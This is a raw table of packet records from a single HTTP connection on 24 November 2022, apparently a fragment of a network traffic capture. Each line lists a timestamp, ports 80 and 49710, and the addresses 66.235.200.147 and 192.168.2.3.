Nov 24, 2022 12:20:03.287936926 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.287966013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.287992954 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.288019896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.288249969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.288281918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.288288116 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.288311958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.288333893 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.288340092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.288367987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.288395882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.288404942 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.288428068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.288459063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.288789034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.289144039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.289181948 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.289203882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.289303064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.290460110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.290498018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.290559053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.290589094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.290616035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.290642023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.290898085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.292195082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.292233944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.292263031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.292284966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.292311907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.292332888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.292360067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.292382956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.292429924 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.292464018 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.293875933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.293916941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.293945074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.293961048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.293971062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.293992996 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.294029951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.294055939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.294081926 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.294099092 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.294107914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.294132948 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.294137955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.294161081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.294168949 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.294188023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.294214010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.294254065 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.295043945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.295078993 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.295104980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.295131922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.295150995 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.295159101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.295166016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.295186043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.295202017 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.295212984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.295238972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.295264006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.295279026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.295301914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.295963049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.296003103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.296030045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.296057940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.296083927 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.296086073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.296108961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.296113014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.296142101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.296169043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.296179056 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.296196938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.296204090 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.296224117 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.296323061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.296871901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.296906948 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.296935081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.296961069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.296983004 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.296986103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.297013998 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.297014952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.299026012 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.302413940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302479982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302508116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302536011 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302561998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302575111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.302589893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302617073 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.302618027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302644968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302659988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.302675962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302695036 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.302716017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302743912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302772045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302783966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.302799940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302812099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.302829027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302858114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302865982 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.302902937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302933931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302961111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.302974939 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.302989006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.303005934 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.303014994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.303041935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.303070068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.303095102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.303096056 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.303123951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.303126097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.304104090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304138899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304166079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304191113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304199934 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.304219007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304240942 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.304245949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304270983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304284096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.304297924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304330111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304356098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304368973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.304382086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304395914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.304409027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304765940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304796934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304812908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.304825068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304851055 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.304852962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304883003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304893017 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.304910898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304939032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304965973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.304977894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.304994106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305010080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.305021048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305047989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305074930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305089951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.305118084 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.305632114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305660963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305689096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305711985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.305716991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305746078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305762053 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.305773973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305800915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305829048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305840969 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.305855989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305871964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.305886030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305916071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.305926085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.305943966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.306642056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.306675911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.306701899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.306735992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.306776047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.306804895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.306832075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.306853056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.306888103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.306914091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.306941032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.306961060 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.306972027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.306997061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.307001114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.307017088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.307028055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.307646990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.307677984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.307703018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.307710886 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.307744026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.307787895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.307816029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.307832003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.307944059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.307970047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308008909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308015108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.308036089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308043957 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.308063984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308090925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308115959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308130980 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.308142900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308161974 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.308167934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308193922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308233023 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.308295012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308322906 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308351040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308366060 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.308379889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308387041 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.308407068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308434010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308446884 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.308461905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308487892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308515072 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308527946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.308542013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.308556080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.308568954 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309108973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309140921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309170008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309170961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.309196949 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.309199095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309226990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309241056 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.309256077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309284925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309312105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309339046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309343100 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.309365988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309369087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.309393883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309421062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309439898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.309448957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309470892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.309477091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309504986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309523106 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.309531927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309560061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309612989 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.309947968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.309977055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310004950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310033083 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310035944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.310045004 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.310061932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310091019 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310116053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310117006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.310142040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310164928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.310165882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310189962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310214043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310216904 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.310240984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310251951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.310266972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310293913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310321093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310329914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.310349941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310359001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.310376883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310415983 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.310950994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.310981035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311007977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311037064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311059952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311081886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311103106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311110020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.311125040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311150074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311177015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311186075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.311203957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311208963 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.311227083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.311233044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311259031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311276913 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.311285973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311312914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311342001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311356068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.311388969 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.311882019 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311914921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311943054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311969042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.311995983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312021017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312031031 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.312041998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312068939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312072039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.312072039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.312097073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312120914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312131882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.312144995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312170029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312196016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312205076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.312222004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312227011 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.312247992 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312273026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312295914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312376022 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.312762022 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.312767982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312793970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.312819004 CET	49710	80	192.168.2.3	66.235.200.147
